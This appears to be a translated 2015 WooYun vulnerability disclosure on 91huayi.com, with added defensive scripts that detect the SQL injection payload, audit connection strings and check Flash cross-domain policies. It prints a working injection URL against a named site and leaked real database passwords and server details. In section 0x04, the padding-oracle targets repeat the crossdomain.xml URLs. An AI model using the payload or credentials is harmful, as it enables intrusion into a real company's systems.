Vulnerability summary

Defect ID: wooyun-2015-0147517

Title: 91huayi, multiple high-risk vulnerabilities (bundled)

Vendor: 91huayi.com

Author: 路人甲

Submitted: 2015-10-19 11:33

Fixed: 2015-12-03 12:42

Disclosed: 2015-12-03 12:42

Type: SQL injection

Severity: High

Self-assessed rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-19: Details sent to the vendor; awaiting vendor handling
2015-10-19: Vendor confirmed; details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and relevant domain experts
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to intern white hats
2015-12-03: Details disclosed to the public

Summary:

As per the title.

Details:

0x01: SQL injection

http://oa.91huayi.com/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23


[Screenshot: 1.png]


Reference: http://wooyun.org/bugs/wooyun-2010-0116951
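
The request in 0x01 is an error-based MySQL injection: the `%df%27` prefix is a wide-byte (GBK) sequence that swallows the backslash an escaping function puts before the quote, and the `count(*) ... floor(rand(0)*2) ... group by` construct forces a duplicate-key error whose message carries the selected value. On the application side the fix is a prepared statement with the connection charset set explicitly; on the detection side, the following Python example (added here, not code from the report or from 91huayi) scans access-log lines for that payload shape, decoding the query string to raw bytes first so the wide-byte prefix stays visible. The log lines are constructed; the injection payload in the second line is the one quoted above.

```python
"""Detect error-based MySQL injection attempts in web access logs.

Added example for this page, not WooYun's or 91huayi's code. The log lines are
constructed; the payload in the second line is the one quoted in the report.
"""
import re
from urllib.parse import unquote_to_bytes

# Signatures of the error-based "duplicate entry" technique:
#   count(*), concat(...), floor(rand(0)*2) ... group by  -> forced duplicate-key error
# plus the information_schema reference and the trailing comment that discards
# the rest of the original statement.
SIGNATURES = [
    ("floor_rand_groupby", re.compile(rb"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I)),
    ("group_by_count_concat", re.compile(rb"count\s*\(\s*\*\s*\).*concat\s*\(.*group\s+by", re.I | re.S)),
    ("information_schema", re.compile(rb"information_schema\.", re.I)),
    ("sql_comment_tail", re.compile(rb"(#|--\s|/\*)\s*$")),
]
# A high byte (0x81-0xFE) immediately followed by a quote: the GBK wide-byte trick
# that makes a backslash-escaped quote part of a two-byte character.
WIDE_BYTE_QUOTE = re.compile(rb"[\x81-\xfe][\x27\x22]")

# Common Log Format: ip ident user [time] "METHOD path PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample; the second line carries the payload from this report.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Oct/2015:11:20:01 +0800] "GET /interface/auth.php?PASSWORD=1&USER_ID=admin HTTP/1.1" 200 512',
    '10.0.0.9 - - [19/Oct/2015:11:21:44 +0800] "GET /interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 500 1337',
    '10.0.0.7 - - [19/Oct/2015:11:22:10 +0800] "GET /cms/news.php?id=42&page=2 HTTP/1.1" 200 8080',
]


def decode_query(path: str) -> bytes:
    """Percent-decode the query string to raw bytes (not str), so %df stays a lone high byte."""
    _, _, query = path.partition("?")
    return unquote_to_bytes(query)


def classify(line: str):
    """Return the matched signature names for one log line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    raw = decode_query(m.group("path"))
    hits = [name for name, rx in SIGNATURES if rx.search(raw)]
    if WIDE_BYTE_QUOTE.search(raw):
        hits.append("wide_byte_quote")
    return {"ip": m.group("ip"), "status": m.group("status"), "hits": hits}


def scan(lines):
    """Alert on lines matching at least two signatures; a single one is too noisy on its own."""
    alerts = []
    for line in lines:
        c = classify(line)
        if c and len(c["hits"]) >= 2:
            alerts.append(c)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["ip"], alert["status"], ", ".join(alert["hits"]))
```

Matching on decoded bytes rather than on the raw URL matters: a matcher that first decodes to a Unicode string would either fail on the stray `0xDF` byte or silently replace it, and the wide-byte signature would never fire.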
0x02: The full site source of several sub-sites can be downloaded and contains a lot of sensitive information; collected as follows:
http://cms.91huayi.com/cms.91huayi.com.rar
http://dz.91huayi.com/web.rar
http://passport.91huayi.com/passport.91huayi.com.rar
http://admin.91huayi.com/web.rar

[Screenshot: 1.jpg]


Multiple database credentials:

<configuration>
<appSettings>
<add key="WebDAL" value="IDAL.SqlServer"/>
</appSettings>
<connectionStrings>
<add name="SqlConnection" connectionString="user id=sa;password=sa123;database=cme;server=test;Connect Timeout=50" />
<add name="cms_conn0" connectionString="user id=91huayi;password=91huayi999;database=hy_cms;server=219.235.240.232;Connect Timeout=50" />
<add name="cms_conn1" connectionString="user id=91huayi;password=91huayi999;database=hy_cms;server=219.235.240.232;Connect Timeout=50" />
<add name="hy_com_conn0" connectionString="user id=91huayi;password=91huayi999;database=hy_com;server=219.235.240.232;Connect Timeout=50" />
<add name="hy_com_conn1" connectionString="user id=91huayi;password=91huayi999;database=hy_com;server=219.235.240.232;Connect Timeout=50" />
<add name="cme_conn0" connectionString="user id=91huayi;password=91huayi999;database=cme;server=219.235.240.232;Connect Timeout=50" />
<add name="cme_conn1" connectionString="user id=91huayi;password=91huayi999;database=cme;server=219.235.240.232;Connect Timeout=50" />
<add name="yikao_conn0" connectionString="user id=sa;password=sa123;database=yk;server=test;Connect Timeout=50" />
<add name="yikao_conn1" connectionString="user id=sa;password=sa123;database=yk;server=test;Connect Timeout=50" />
<add name="cmeConnectionString1" connectionString="Data Source=hkserver;Initial Catalog=cme;Persist Security Info=True;User ID=sa;MultipleActiveResultSets=False;Packet Size=4096;Application Name=&quot;Microsoft SQL Server Management Studio&quot;"
providerName="System.Data.SqlClient" />
</connectionStrings>
<system.web>


Other information:

<add name="SqlConnection" connectionString="user id=kjpt_131;password=sU3uoFmLTTpdCs21Y4iYv6L1V;database=kjpt_common;server=A01DB03P;Connect Timeout=50"/>
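
The leaked web.config above shows several weaknesses at once: plaintext passwords in the connection strings, the SQL Server `sa` account used by an application, one account and password shared across several databases, and `Persist Security Info=True`. The following Python example (added here, not code from the report or from 91huayi) parses the `<connectionStrings>` section of a web.config and reports those conditions. The sample configuration is constructed with placeholder values in the same shape as the leaked one; none of the leaked credentials are used.

```python
"""Audit the <connectionStrings> section of an ASP.NET web.config.

Added example for this page, not WooYun's or 91huayi's code. The sample config
is constructed with placeholder values; it mirrors the shape of the leaked file only.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

SAMPLE_WEB_CONFIG = """<configuration>
  <connectionStrings>
    <add name="SqlConnection" connectionString="user id=sa;password=PLACEHOLDER_SA;database=cme;server=test;Connect Timeout=50" />
    <add name="cms_conn0" connectionString="user id=appuser;password=PLACEHOLDER_APP;database=hy_cms;server=203.0.113.10;Connect Timeout=50" />
    <add name="cme_conn0" connectionString="user id=appuser;password=PLACEHOLDER_APP;database=cme;server=203.0.113.10;Connect Timeout=50" />
    <add name="reports" connectionString="Data Source=dbhost;Initial Catalog=cme;Integrated Security=True;Persist Security Info=True" providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>"""


def parse_conn_string(s: str) -> dict:
    """Split 'key=value;key=value' into a dict with lower-cased keys."""
    out = {}
    for part in s.split(";"):
        if "=" in part:
            k, _, v = part.partition("=")
            out[k.strip().lower()] = v.strip()
    return out


def audit(xml_text: str):
    """Return a list of (connection name(s), finding) tuples."""
    root = ET.fromstring(xml_text)
    findings = []
    shared = defaultdict(list)  # (user, password) -> names of connections using that pair
    for add in root.iterfind("./connectionStrings/add"):
        name = add.get("name")
        cs = parse_conn_string(add.get("connectionString", ""))
        user = cs.get("user id") or cs.get("uid")
        pwd = cs.get("password") or cs.get("pwd")
        if pwd:
            # A secret in the config file: a download of the site tree exposes it directly.
            findings.append((name, "plaintext_password"))
            shared[(user, pwd)].append(name)
        if user and user.lower() == "sa":
            # The instance sysadmin account should never be an application login.
            findings.append((name, "sysadmin_account"))
        if cs.get("persist security info", "").lower() == "true":
            # Keeps the password retrievable from the open connection object.
            findings.append((name, "persist_security_info"))
    for (_user, _pwd), names in shared.items():
        if len(names) > 1:
            # One login for several databases: a single leak opens all of them.
            findings.append((tuple(names), "credential_reused"))
    return findings


if __name__ == "__main__":
    for target, finding in audit(SAMPLE_WEB_CONFIG):
        print(f"{finding:24} {target}")
```

Beyond fixing the individual findings, the section itself can be encrypted in place with `aspnet_regiis -pe "connectionStrings"` so that a copied web.config no longer yields usable credentials, and per-database logins with only the rights each application needs replace the shared account.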

Proof of vulnerability:

0x03: Multiple sub-sites have a permissive Flash cross-domain policy (including but not limited to the sites below; stopping here)
http://cme.91huayi.com/crossdomain.xml
http://v.91huayi.com/crossdomain.xml
http://v6.91huayi.com/crossdomain.xml

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
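
With `allow-access-from domain="*"`, any Flash content on any origin may make authenticated requests to these hosts and read the responses, which is the cross-domain equivalent of disabling the same-origin policy for Flash clients. The following Python example (added here, not code from the report or from 91huayi) checks a crossdomain.xml policy for that and related over-broad grants, and contrasts the quoted policy with a constructed hardened one that names only the origins assumed to need access.

```python
"""Check a Flash crossdomain.xml policy for over-broad grants.

Added example for this page, not WooYun's or 91huayi's code. The hardened policy
is a constructed illustration; the origins it lists are assumptions.
"""
import xml.etree.ElementTree as ET

# The policy quoted in the report.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>"""

# Constructed replacement: explicit origins only, HTTPS only, no per-directory policies.
HARDENED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="v.91huayi.com" secure="true" />
  <allow-access-from domain="cme.91huayi.com" secure="true" />
</cross-domain-policy>"""


def audit_policy(xml_text: str):
    """Return a list of issue labels; an empty list means nothing over-broad was found."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["not_a_cross_domain_policy"]
    issues = []
    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies", "") == "all":
        # Lets any file on the host act as a policy file, not just the master one.
        issues.append("site_control_all")
    for el in root.iter("allow-access-from"):
        dom = el.get("domain", "")
        if dom == "*":
            issues.append("wildcard_domain")
        elif dom.startswith("*."):
            # Every current and future subdomain, including any an attacker controls.
            issues.append("subdomain_wildcard:" + dom)
        if el.get("secure", "true").lower() == "false":
            # Allows plain-HTTP Flash content to reach an HTTPS host.
            issues.append("secure_false:" + dom)
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*" or el.get("headers") == "*":
            issues.append("wildcard_header_grant")
    return issues


if __name__ == "__main__":
    print("permissive:", audit_policy(PERMISSIVE_POLICY))
    print("hardened:  ", audit_policy(HARDENED_POLICY))
```

The same check applies to any host that still serves a crossdomain.xml: if no Flash or Silverlight client legitimately needs cross-origin access, the right policy is no file at all, or one with no `allow-access-from` entries.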


0x04: Multiple sub-sites are vulnerable to padding oracle attacks, including but not limited to:

http://cme.91huayi.com/crossdomain.xml
http://v.91huayi.com/crossdomain.xml
http://v6.91huayi.com/crossdomain.xml

Fix recommendation:

I'm just here for the gift!

Copyright notice: please credit the source 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-10-19 12:41

Vendor reply:

Thank you for your report! The relevant department has been notified to handle it.

Latest status:

None yet